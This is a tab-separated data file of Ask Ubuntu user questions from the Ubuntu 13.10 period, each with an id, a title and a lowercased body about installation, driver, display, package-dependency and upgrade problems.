362865	creating a library for ubuntu touch	i am a software developer that usually deals with windows products ( c # ) and android products ( java ) and they both have a relatively easy was to write and use libraries across projects , c # having .dll 's and java having .jar 's . i have background in all sorts of languages , c++ , python , java , c # , web development ( which includes javascript ) so developing for ubuntu touch should n't be to much of a challenge for me . and then i started ... what i want to do is write a library in c++ ( are there any other languages i could use ? ) that i can use across my applications ( for ubuntu touch ) . i know what i need to do programming wise . but when it comes to using the library what do i need to do ? that part of it is what is getting me . my question really is , how do i write a library and then import it into my application ? i see that there is a dependencies tab in the project manager in qtcreator , but not to sure what else i need to do .
362866	how do i get defaults for 13.10	i just upgraded my system to 13.10 and i may have made a mistake . at one stage it asked me about gnome something and if i wanted the defaults or to keep what i had . i may have mistakenly chosen to keep what i had . the immediate problem i have ( which may or may not be connected to the above ) is that the system is getting confused with my 2 monitors . at the stage of login it has them backwards - the right one on the left and the left on the right . i can tell this by moving the cursor from one screen to the other - it goes off the right edge of the right screen and lands on the left edge of the left screen . when the system comes up i can see that it is still wrong because the left one is 1920x1080 and the right is 1680x1050 and the left image comes over to 1680 instead of 1920 . if i move the cursor to the right edge suddenly it straightens itself out . two questions : 1 ) if i can somehow ask for the default values of the gnome - if that is a possible problem . 2 ) if i can set up proper values for the screen positions at boot time ? thanks , ilan
362867	black screen then shut down during boot up	just new to ubuntu and installed version 13.10 . so i installed it on my laptop which has an nvidia graphics card ( gt 425m ) and got the drivers from the additional updates thing . then when i boot up my computer again i see an nvidia sign then a black screen then shuts down . sometimes i get to see the log on screen but gives me a black screen after 5 seconds then shuts down . okay this problem has been with me for 2 years , i 'm planning on getting a new computer next year . this happens to me with windows aswell , so what i do is i get msi after burner and under clock the core speed . so how do fix this in ubuntu ? you guys have any idea ? i do n't really know what 's wrong with the graphics card , electromigration maybe ? thank you .
362868	how to show only running applications in the sound indicator	how to show only the running applications in the sound indicator ( not all supported ) . after upgrading from 13.04 to 13.10 this is how it looks .
362871	installing ubuntu problem with unallocated space	i had 4 drives ( c , d , e , f ) in my windows 7 , now i want to install ubuntu as dual boot . for that i shrink my one of the drive and made some space ( 12 gb ) to install ubuntu as unallocated space , but during ubuntu installation its not showing that unallocated space it is showing total space.how can i install ubuntu in separate partition
362872	is using software updater the same thing as running apt-get update and apt-get upgrade ?	it seems like this should be true but i wanted to make sure . thanks !
362875	no sound with philips saa7130 hybrid capture device card	i have put a philips saa7130 hybrid capture device card in a pci slot . also i have installed tvtime television viewer . i have received video , but i ca n't get audio . please help step by step to solve the problem .
362876	force to start xbmc in fullscreen mode ?	i really tried : xbmc -fs and using the script way : xbmc sleep 10 wmctrl -x -r xbmc media center.xbmc media center -b toggle , fullscreen from this script . and yes , i know the key `` |\ '' exists to switch between windowed and fullscreen . but i want to force to always in fullscreen mode . none this works . any sugestion ?
362878	xorg.conf ( nvidia ) second monitor getting settings of first	i 've been spending the weekend ( and some time before that ) trying to set up my korean qhd270 and benq g2222hdl monitors with ubuntu 13.10 . with the nouveau drivers install both monitor function perfectly fine . after installing the nvidia drivers the benq works but the qhd270 does not . now , after days of struggling i managed to get the qhd270 to work following a mixture of blogs , particularly ; this one and learnitwithme . now , unfortunatly my g2222hdl does not work . i fixed the qhd270 by supplying a custom edid , my xorg.conf looks like so ( excluding keyboard and mouse ) : section `` serverlayout '' identifier `` layout0 '' screen `` default screen '' 0 0 inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' endsection section `` monitor '' identifier `` configured monitor '' endsection section `` device '' identifier `` configured video device '' driver `` nvidia '' option `` customedid '' `` dfp : /etc/x11/edid-shimian.bin '' endsection section `` screen '' identifier `` default screen '' device `` configured video device '' monitor `` configured monitor '' endsection now , i tried defining a new device , monitor and screen then in serverlayout adding screen `` second screen '' rightof `` default screen '' , but after doing so neither monitor worked . hoping to fix the issue using a gui based tool i opened up nvidia x server settings , which shows my current layout as : it seems that something is being output to the monitor , as suggested by my print screen : any help would be greatly appreciated . output of xrandr : screen 0 : minimum 8 x 8 , current 5120 x 1440 , maximum 16384 x 16384 dvi-i-0 disconnected ( normal left inverted right x axis y axis ) dvi-i-1 connected primary 2560x1440+0+0 ( normal left inverted right x axis y axis ) 597mm x 336mm 2560x1440 60.0*+ hdmi-0 disconnected ( normal left inverted right x axis y axis ) dp-0 disconnected ( normal left inverted right x axis y axis ) dvi-d-0 connected 2560x1440+2560+0 ( normal left inverted right x axis y axis ) 597mm x 336mm 2560x1440 60.0*+ dp-1 disconnected ( normal left inverted right x axis y axis ) and an extract from my log file ( perhaps this is relevant ? ) [ 7.862 ] ( -- ) nvidia ( 0 ) : valid display device ( s ) on geforce gtx 680 at pci:2:0:0 [ 7.862 ] ( -- ) nvidia ( 0 ) : crt-0 [ 7.862 ] ( -- ) nvidia ( 0 ) : acb qhd270 ( dfp-0 ) ( boot , connected ) [ 7.862 ] ( -- ) nvidia ( 0 ) : dfp-1 [ 7.862 ] ( -- ) nvidia ( 0 ) : dfp-2 [ 7.862 ] ( -- ) nvidia ( 0 ) : dfp-3 [ 7.862 ] ( -- ) nvidia ( 0 ) : dfp-4 [ 7.862 ] ( -- ) nvidia ( 0 ) : crt-0 : 400.0 mhz maximum pixel clock [ 7.862 ] ( -- ) nvidia ( 0 ) : acb qhd270 ( dfp-0 ) : 330.0 mhz maximum pixel clock [ 7.862 ] ( -- ) nvidia ( 0 ) : acb qhd270 ( dfp-0 ) : internal dual link tmds [ 7.862 ] ( -- ) nvidia ( 0 ) : dfp-1 : 165.0 mhz maximum pixel clock [ 7.862 ] ( -- ) nvidia ( 0 ) : dfp-1 : internal single link tmds [ 7.862 ] ( -- ) nvidia ( 0 ) : dfp-2 : 165.0 mhz maximum pixel clock [ 7.862 ] ( -- ) nvidia ( 0 ) : dfp-2 : internal single link tmds [ 7.862 ] ( -- ) nvidia ( 0 ) : dfp-3 : 330.0 mhz maximum pixel clock [ 7.862 ] ( -- ) nvidia ( 0 ) : dfp-3 : internal single link tmds [ 7.862 ] ( -- ) nvidia ( 0 ) : dfp-4 : 960.0 mhz maximum pixel clock [ 7.862 ] ( -- ) nvidia ( 0 ) : dfp-4 : internal displayport
362883	install command not working	does anyone know why this command is n't working for me , sudo dpkg -install webmin_1.620_all.deb it says , dpkg : error : unknown option - n i am following directions on this website : http : //refugeeks.com/owncloud-setup-guide/ i am running ubuntu server 12.04 32bit with ssh and lamp installed .
362887	boot partition full , clean-up	after a while i could n't update ubuntu for lack of space in the boot partition . i need to clean it up . how can i do this ?
362889	error calling startservicebyname for org.gtk.vfs.daemon : timeout was reached ( g-io-error-quark , 24 )	upon starting the xfce4 on ubuntu 13.10 , i always get the following message in the log : error creating proxy : error calling startservicebyname for org.gtk.vfs.daemon : timeout was reached ( g-io-error-quark , 24 ) ( xfsettingsd:10814 ) : gvfs_critical ** : fill_mountable_info : assertion 'proxy ! = null` failed it appears about 20 seconds after the login and it also appeared on the previous version 13.04 . it 's a minor issue , but it 's sometimes irritating because it sometimes hangs the logout , for example if i have logged in as the wrong user . here is the output of the ps -ef | grep gvfs command : 10821 1 0 08:37 ? 00:00:00 /usr/lib/gvfs/gvfsd 10826 1 0 08:37 ? 00:00:00 /usr/lib/gvfs//gvfsd-fuse -f /run/user/1000/gvfs 10890 1 0 08:37 ? 00:00:00 /usr/lib/gvfs/gvfs-udisks2-volume-monitor 10899 1 0 08:37 ? 00:00:00 /usr/lib/gvfs/gvfs-afc-volume-monitor 10906 1 0 08:37 ? 00:00:00 /usr/lib/gvfs/gvfs-gphoto2-volume-monitor 10914 1 0 08:37 ? 00:00:00 /usr/lib/gvfs/gvfs-mtp-volume-monitor how can this be solved ?
362890	google-chrome install/upgrading failed in ubuntu 13.04	if i try to install , this shows up : sudo apt-get install google-chrome-stable reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : google-chrome-stable : depends : lib32gcc1 ( > = 1:4.1.1 ) but it is not installable depends : lib32stdc++6 ( > = 4.6 ) but it is not installable depends : libc6-i386 ( > = 2.11 ) but it is not installable e : unable to correct problems , you have held broken packages . if i try to upgrade , this happens : sudo apt-get upgrade google-chrome reading package lists ... done building dependency tree reading state information ... done the following packages have been kept back : google-chrome-stable 0 upgraded , 0 newly installed , 0 to remove and 1 not upgraded . plz , help ...
362892	vmware shared folder not working in ubuntu 13.10	i installed ubuntu 13.10 64 bit in vmware workstation 10 but the shared folder is not working in ubuntu 13.10 , while it works perfectly in ubuntu 13.04.i reinstalled vmware tools several times but it does n't work . all other features like drag and drop is working . any ideas how to get it working ?
362893	can i install ubuntu 13.10 os on my lenovo a660 smartphone	hi i want to install ubuntu os in my lenovo a660 smartphone as i am a huge fan of ubuntu and i am using ubuntu on my pc . now i want to use ubuntu on my smartphone . so please tell me every step for installing ubuntu . thanks .
362894	changing the brightness stopped working in 13.10 saucy salamander	after the upgrade to 13.10 saucy salamander , the brightness controls stopped working . this worked fine from 12.04 throughout . does anyone have an idea how i can fix this ? if not , can you point me at the right package to file a bug against ? bug i filed so far : https : //bugs.launchpad.net/ubuntu/+source/xorg/+bug/1241745 solutions i have tried : /etc/default/grub changed this line to several options : grub_cmdline_linux= '' '' â grub_cmdline_linux= '' quiet splash acpi_osi=linux acpi_backlight=vendor '' grub_cmdline_linux= '' acpi_backlight=vendor '' grub_cmdline_linux=âacpi_osi= '' ! windows 2012 '' sudo update-grub none worked . i also tried to use xbacklight , which did n't work either . xbacklight -get would n't return anything .
362896	google sync brings back login keyring from previous distro : how to remove ?	i previously had ubuntu 12.04 and had my login keyring set to a password that i do n't remember and am not able to guess . i changed my linux version to mint 15 cinnamon recently , but everytime i sync my google account with my browser , the login keyring keeps coming back . i tried the /preferences/password method but there is no file as such which is created . also , .gnome2 folder does n't have any keyring file . how can i make the box go away for all ?
362902	how do i disable the guest session in ubuntu 13.10 ?	with ubuntu 13.10 this question on how to disable the guest session no longer works because i think the lightdm config files have changed in ubuntu 13.10 . i know you used to have to add the line allow-guest=false to the file /etc/lightdm/lightdm.conf to disable the guest account but there is no file with this name . i see four config files in /etc/lightdm/lightdm.conf.d and i am not 100 % on which one i edit for this . i think it 's the file 10-ubuntu.conf but i donât really know .
362904	seahorse , pgp : what does the exported .pgp-file contain ?	i created a pgp-key with seahorse 3.6.3 . if i select the key and go to `` file - > export '' , i can choose between two options : an .asc-file , which exports the public key in a text format , and a .pgp-file , which creates a binary file . i ca n't figure out what the binary file contains and for what it is used . does it contain my private key ? can i give it away ( because i did without understanding what i was doing ) ? what is it for ? tia .
362905	how do i to resolve unmet dependencies to uninstall and reinstall package	i have tried several askubuntu threads but yet to no avail none have all met qualifications . i installed allvideodownloader , and found a better version an earlier version ; i downloaded from software-center , so there should not have been a related programs version problem and i got this error : the following packages have unmet dependencies : allvideodownloader : depends : allvideodownloader-bin ( = 2.6.0-0ubuntu1 ) apache2.2-bin : depends : libaprutil1-ldap but it is not going to be installed e : error , pkgproblemresolver : :resolve generated breaks , this may be caused by held packages . i have tried the usual suspects , in synaptic , software-center and aptitude . apt-get autoremove -- purge allvideodownloader package allvideodownloader is not installed , so not removed 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded apt-get remove -- auto-remove allvideodownloader-bin package allvideodownloader is not installed , so not removed 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded apt-get remove -- auto-remove allvideodownloader-bin e unable to locate package allvideoinstaller-bin sudo apt-get install allvideoinstaller-bin e unable to locate package allvideoinstaller-bin this is what i believe to be so ; allvideodownloader changed the versions on several packages at install and did n't change them back at uninstall . these packages are somehow not reverse compatible using usual means . i am having a headache i am growing used to from staring at this problem and that wont help matters . i 've tried manner of install , purge and repair of broken packages please advise me on a repair . thx , dl
362907	ubuntu 13.10 on samsung ultrabook ( np900x4c ) - no wifi or graphics	just upgraded my laptop ( np900x4c-a04se ) to ubuntu 13.10 from 13.04 . i realized that my wifi connection is no longer functional nor my graphic card . i 'm getting black borders around open windows such as nautilus . terminal is completly black . how do i fix this without reverting back to 13.04 ?
362908	13.10 workspace switcher view is duplicated on multiple monitors	i work with an additional monitor connected to my laptop . when i upgraded from 13.04 to 13.10 , the workspace switcher view has changed . in 13.04 i was getting both of the screens showing one switcher view spread across both screens but now each screen is showing a duplicate view . i liked the old way better . how can i switch it back ?
362910	swedish keyboard on ubuntu touch	is it possible to add swedish kb layout in ubuntu touch ( r100 ) ? i followed the steps here and added and enabled `` sv '' ( which is the utf-8 code for sweden ) in /home/phablet/.config/maliit.org/server.conf , but the keyboard layout is still the same as before .
362911	how to enable log in administrator password ?	i have enabled my administrative password but when i start my computer and just click on administrator it logins in without asking for a password . i want it to be that whenever i start my computer it asks me for password ( for the administrator account ) before logging in .
362914	how to prevent the power button to shutdown directly the system ?	i did a fresh install of ubuntu 13.10 . when i press my power button , my computer immediately shuts down . in ubuntu 13.04 i got a nice menu , where i could choose what to do . it is gone now and i want it back . here is my /etc/acpi/powerbtn.sh in pastebin . i already did gsettings set org.gnome.settings-daemon.plugins.power button-word 'interactive' where word is hibernate , power , sleep and suspend .
362916	not able to install php5-dev in 13.04	i 'm trying to run phpize in ubuntu . however , it seems that the php5dev is not installed . so i run apt-get install php5-dev however the terminal returning some error messages : err http : //sg.archive.ubuntu.com/ubuntu/ raring-updates/main linux-libc-dev i386 3.8.0-30.44 404 not found err http : //security.ubuntu.com/ubuntu/ raring-security/main linux-libc-dev i386 3.8.0-30.44 404 not found [ ip : 91.189.92.202 80 ] failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc- dev_3.8.0-30.44_i386.deb 404 not found [ ip : 91.189.92.202 80 ] e : unable to fetch some archives , maybe run apt-get update or try with -- fix-missing ? myuser @ myserver : /tmp/upgrade/gearman-1.0.2 $ lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 13.04 release : 13.04 codename : raring is there anything i did wrong ?
362918	dual boot with windows 8.1 - no installed os	upgraded to windows 8.1 - now trying to dual-boot with ubuntu 13.10 . when the install routine gets to the what to do part , it says `` no recognisable os found '' . i hesitate to contine manually , as i do n't want ubuntu to remove the ability to boot into windows should i require to ... . anyone come across this and is there a fix ?
362920	smartgit crash in ubuntu 13.10	when i try select repository application crash . it 's perhaps bug https : //bugs.launchpad.net/ubuntu/+source/java-common/+bug/1241101
362924	small ubuntu openstack deployment	i 'm looking to create small private cloud and ubuntu with maas and juju looks like good option . but i ca n't find any reference architecture from physical perspective ( hardware ) what is required . i would like to have 4 nova virtualisation servers and support infrastructure around it . if ha is requirement does it mean that there must be 2 open stack physical boxes to manage the cluster and 2 additional maas servers to manage physical hardware ? and how the network connections will looks like from physical perspective ? if anybody can point me to a diagram explaining this i would be very graceful . thanks jozef
362925	ubuntu 13.10 gnome3-next 404 not found	i 've upgraded from ubuntu 13.04 ( gnome ) to 13.10 ( gnome ) but after that i have added the repository of gnome next ppa : gnome3-team/gnome3-next and make a refresh of repositories receive this error : failed to fetch http : //ppa.launchpad.net/gnome3-team/gnome3-ext/dists//ubuntu/saucy/binary-amd64/packages 404 not found someone knows why ? thanks a lot
362927	unity dash dispays no files or folders , filter option is missing , returns no search results	basically my unity dash is not working
362930	ubuntu upgrade fails from 13.04 to 13.10	ubuntu upgrade fails with following lines : calculating the changes calculating the changes could not calculate the upgrade an unresolvable problem occurred while calculating the upgrade . this can be caused by : upgrading to a pre-release version of ubuntu running the current pre-release version of ubuntu unofficial software packages not provided by ubuntu if none of this applies , then please report this bug using the command 'ubuntu-bug ubuntu-release-upgrader-core ' in a terminal . restoring original system state aborting reading package lists ... done building dependency tree reading state information ... done building data structures ... done in the /var/log/dist-upgrade/apt.log grep broken /var/log/dist-upgrade/apt.log broken libwayland-client0 : amd64 conflicts on libwayland0 [ amd64 ] < 1.0.5-0ubuntu1 > ( libs ) ( < 1.1.0 ) broken libunity9 : amd64 breaks on unity-common [ amd64 ] < 7.0.0daily13.06.19~13.04-0ubuntu1 > ( gnome ) ( < 7.1.2 ) broken cups-filters : amd64 conflicts on ghostscript-cups [ amd64 ] < 9.07~dfsg2-0ubuntu3.1 > ( text ) broken libpam-systemd : amd64 conflicts on libpam-xdg-support [ amd64 ] < 0.2-0ubuntu2 > ( admin ) broken libharfbuzz0a : amd64 breaks on libharfbuzz0 [ amd64 ] < 0.9.13-1 > ( libs ) broken libharfbuzz0a : amd64 breaks on libharfbuzz0 [ i386 ] < 0.9.13-1 > ( libs ) broken libunity-scopes-json-def-desktop : amd64 conflicts on libunity-common [ amd64 ] < 6.90.2daily13.04.05-0ubuntu1 > ( gnome ) ( < 7.0.7 ) broken libunity-scopes-json-def-desktop : amd64 conflicts on libunity-common [ i386 ] < none > ( none ) ( < 7.0.7 ) broken libaccount-plugin-generic-oauth : amd64 conflicts on account-plugin-generic-oauth [ amd64 ] < 0.10bzr13.03.26-0ubuntu1.1 > ( gnome ) ( < 0.10bzr13.04.30 ) broken libaccount-plugin-generic-oauth : amd64 breaks on account-plugin-generic-oauth [ amd64 ] < 0.10bzr13.03.26-0ubuntu1.1 > ( gnome ) ( < 0.10bzr13.04.30 ) broken python3-aptdaemon.pkcompat : amd64 breaks on libpackagekit-glib2-14 [ amd64 ] < 0.7.6-3ubuntu1 > ( libs ) ( < = 0.7.6-4 ) broken libsnmp30 : amd64 breaks on libsnmp15 [ amd64 ] < 5.4.3~dfsg-2.7ubuntu1 > ( libs ) broken xserver-xorg-video-mach64 : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken unity-gtk2-module : amd64 conflicts on appmenu-gtk [ amd64 ] < 12.10.3daily13.04.03-0ubuntu1 > ( libs ) broken libqscintilla2-l10n : amd64 breaks on libqscintilla2-translations [ amd64 ] < 2.7.1-0ubuntu1 > ( libs ) broken xserver-xorg-video-intel : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-r128 : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken unity-gtk3-module : amd64 conflicts on appmenu-gtk3 [ amd64 ] < 12.10.3daily13.04.03-0ubuntu1 > ( libs ) broken xserver-xorg-video-nouveau : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-cirrus : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken activity-log-manager : amd64 conflicts on activity-log-manager-common [ amd64 ] < 0.9.4-0ubuntu6.2 > ( utils ) broken libgtksourceview-3.0-0 : amd64 depends on libgtksourceview-3.0-common [ amd64 ] < 3.6.3-0ubuntu1 - > 3.8.2-0ubuntu1 > ( libs ) ( < 3.7 ) broken libunity-core-6.0-5 : amd64 depends on unity-services [ amd64 ] < 7.0.0daily13.06.19~13.04-0ubuntu1 - > 7.1.2+13.10.20131014.1-0ubuntu1 > ( gnome ) ( = 7.0.0daily13.06.19~13.04-0ubuntu1 ) broken libbamf3-1 : amd64 depends on bamfdaemon [ amd64 ] < 0.4.0daily13.06.19~13.04-0ubuntu1 - > 0.5.1+13.10.20131011-0ubuntu1 > ( libs ) ( = 0.4.0daily13.06.19~13.04-0ubuntu1 ) broken geany-plugin-gdb : amd64 depends on geany-plugins-common [ amd64 ] < 0.21.1.dfsg-4 - > 1.23+dfsg-3 > ( universe/devel ) ( = 0.21.1.dfsg-4 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-cirrus [ amd64 ] < 1:1.5.2+git20130108.e2bf5b25-0ubuntu0sarvatt > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-intel [ amd64 ] < 2:2.99.904+git20131009.b9ad5b62-0ubuntu0sarvatt~raring > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-nouveau [ amd64 ] < 1:1.0.9+git20130730.300c5a32-0ubuntu0sarvatt~raring > ( x11 ) broken xserver-xorg-video-ati : amd64 depends on xserver-xorg-video-r128 [ amd64 ] < 6.9.1+git20130104.24f28a78-0ubuntu0sarvatt > ( x11 ) broken xserver-xorg-video-ati : amd64 depends on xserver-xorg-video-mach64 [ amd64 ] < 6.9.4+git20130104.80e62cc1-0ubuntu0sarvatt > ( x11 ) broken xserver-xorg-video-mach64 : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-intel : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-r128 : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-nouveau : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-cirrus : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-cirrus [ amd64 ] < 1:1.5.2+git20130108.e2bf5b25-0ubuntu0sarvatt > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-intel [ amd64 ] < 2:2.99.904+git20131009.b9ad5b62-0ubuntu0sarvatt~raring > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-nouveau [ amd64 ] < 1:1.0.9+git20130730.300c5a32-0ubuntu0sarvatt~raring > ( x11 ) broken xserver-xorg-video-ati : amd64 depends on xserver-xorg-video-r128 [ amd64 ] < 6.9.1+git20130104.24f28a78-0ubuntu0sarvatt > ( x11 ) broken xserver-xorg-video-ati : amd64 depends on xserver-xorg-video-mach64 [ amd64 ] < 6.9.4+git20130104.80e62cc1-0ubuntu0sarvatt > ( x11 ) broken xserver-xorg-video-mach64 : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-intel : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-r128 : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-nouveau : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-cirrus : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-cirrus [ amd64 ] < 1:1.5.2+git20130108.e2bf5b25-0ubuntu0sarvatt > ( x11 ) broken xserver-xorg-video-ati : amd64 depends on xserver-xorg-video-r128 [ amd64 ] < 6.9.1+git20130104.24f28a78-0ubuntu0sarvatt > ( x11 ) broken xserver-xorg-video-mach64 : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-intel : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-r128 : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-nouveau : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-cirrus : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-cirrus [ amd64 ] < 1:1.5.2+git20130108.e2bf5b25-0ubuntu0sarvatt > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-intel [ amd64 ] < 2:2.99.904+git20131009.b9ad5b62-0ubuntu0sarvatt~raring > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-nouveau [ amd64 ] < 1:1.0.9+git20130730.300c5a32-0ubuntu0sarvatt~raring > ( x11 ) broken xserver-xorg-video-ati : amd64 depends on xserver-xorg-video-r128 [ amd64 ] < 6.9.1+git20130104.24f28a78-0ubuntu0sarvatt > ( x11 ) broken xserver-xorg-video-ati : amd64 depends on xserver-xorg-video-mach64 [ amd64 ] < 6.9.4+git20130104.80e62cc1-0ubuntu0sarvatt > ( x11 ) broken xserver-xorg-video-mach64 : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-intel : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-r128 : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-nouveau : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-cirrus : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-cirrus [ amd64 ] < 1:1.5.2+git20130108.e2bf5b25-0ubuntu0sarvatt > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-intel [ amd64 ] < 2:2.99.904+git20131009.b9ad5b62-0ubuntu0sarvatt~raring > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-nouveau [ amd64 ] < 1:1.0.9+git20130730.300c5a32-0ubuntu0sarvatt~raring > ( x11 ) broken xserver-xorg-video-ati : amd64 depends on xserver-xorg-video-r128 [ amd64 ] < 6.9.1+git20130104.24f28a78-0ubuntu0sarvatt > ( x11 ) broken xserver-xorg-video-ati : amd64 depends on xserver-xorg-video-mach64 [ amd64 ] < 6.9.4+git20130104.80e62cc1-0ubuntu0sarvatt > ( x11 ) broken xserver-xorg-video-mach64 : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-intel : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken libxfixes3 : amd64 breaks on xserver-xorg-core [ amd64 ] < 2:1.13.4~git20130508+server-1.13-branch.10c42f57-0ubuntu0ricotz~raring - > 2:1.14.3-3ubuntu2 > ( x11 ) ( < 2:1.14 ) broken xserver-xorg-video-ati : amd64 depends on xserver-xorg-video-mach64 [ amd64 ] < 6.9.4+git20130104.80e62cc1-0ubuntu0sarvatt > ( x11 ) broken xserver-xorg-video-intel : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-r128 : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-nouveau : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-cirrus : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-ati [ amd64 ] < 1:7.1.99+git20130730.6a278369-0ubuntu0sarvatt~raring - > 1:7.2.0-0ubuntu10 > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-cirrus [ amd64 ] < 1:1.5.2+git20130108.e2bf5b25-0ubuntu0sarvatt > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-intel [ amd64 ] < 2:2.99.904+git20131009.b9ad5b62-0ubuntu0sarvatt~raring > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-nouveau [ amd64 ] < 1:1.0.9+git20130730.300c5a32-0ubuntu0sarvatt~raring > ( x11 ) broken xserver-xorg-video-ati : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-ati [ amd64 ] < 1:7.1.99+git20130730.6a278369-0ubuntu0sarvatt~raring - > 1:7.2.0-0ubuntu10 > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-cirrus [ amd64 ] < 1:1.5.2+git20130108.e2bf5b25-0ubuntu0sarvatt > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-intel [ amd64 ] < 2:2.99.904+git20131009.b9ad5b62-0ubuntu0sarvatt~raring > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-nouveau [ amd64 ] < 1:1.0.9+git20130730.300c5a32-0ubuntu0sarvatt~raring > ( x11 ) please help me to fix problem ...
362932	upgrade notes for apache2.4	where can i find the upgrade notes for 13.10 regarding the apache upgrade from 2.2 to 2.4 ? in the apache upgrade notes a commenter is harshly accused of not having read `` the upgrade notes that the package manager wrote so laboriously '' . so i looked into the release notes for saucy but regarding apache they again point to the apache upgrade notes . where else should i search ?
362933	network disabled on some wake-ups on saucy laptop	since i upgraded to saucy salamander 13.10 , with every third suspend or so , the network is disabled and i 'm unable to re-enable it . i 've had to reboot to make it run again . the network menu will have the option enable network but clicking it will only produce a tick in the menu item , nothing else changes . how can i make it enable automatically after suspend ? in the meantime , is there a workaround to at least manually re-enable it ? the pc is a lenovo ideapad s205 using drivers r8169 and rt2800pci .
362934	i am trying to connect a bacula director on linux ubuntu and a file daemon on windows 7.my problem is i am getting this error	i am trying to connect a bacula director on linux ubuntu and a file daemon on windows 7.my problem is i am getting this error 21-oct 11.25 ubuntu01-dir jobid 0 fatal error : bsock.c:133 unable to connect to cl覺ent : whycliff-pc-fd on 10.0.4.156:9102 . err=connection refused the whycliff-pc-fd is my windows 7 file daemon system and ubuntu01-dir is the main sever . what do you guys think might be the problem
362935	can i open a dash query by clicking on a link ?	what i would like to do is that whenever i click on a link like dash : //berlin ( or even like search : //berlin ) , it should open the ubuntu dash with the query “berlin” already typed in . this would be very useful on forums and help sites to show examples . i find it quite similar with apturl ( apt : //vlc ) or with android ( and ios to a very limited extent ) , where clicking on a youtube link opens the youtube app . i am on ubuntu 13.10 with the smart scopes service .
362936	network driver for atheros ar8161 corrupted	when i was moving my hdd with linux to a new pc i was experiencing some problems with the ethernet network of this pc , i.e. , it was not working . after i installed the linux-backport-modules package ( downloaded with another pc ) which fitted my kernel it worked . but after ubuntu did a kernel update it the ethernet stopt working again . i tried to install the linux-backport-module for the new kernel but that did n't work out . it is just telling me that it ca n't find the package . i tried different packages ... but it did not work . now i thought about removing the old package first , or what ever backport-modules package are installed but i do n't know how . -- > it is very difficult to deal with that `` offline '' . ubuntu 12.04 lts 3.2.0-54-generic any solutions ? thanks in advance ! philipp
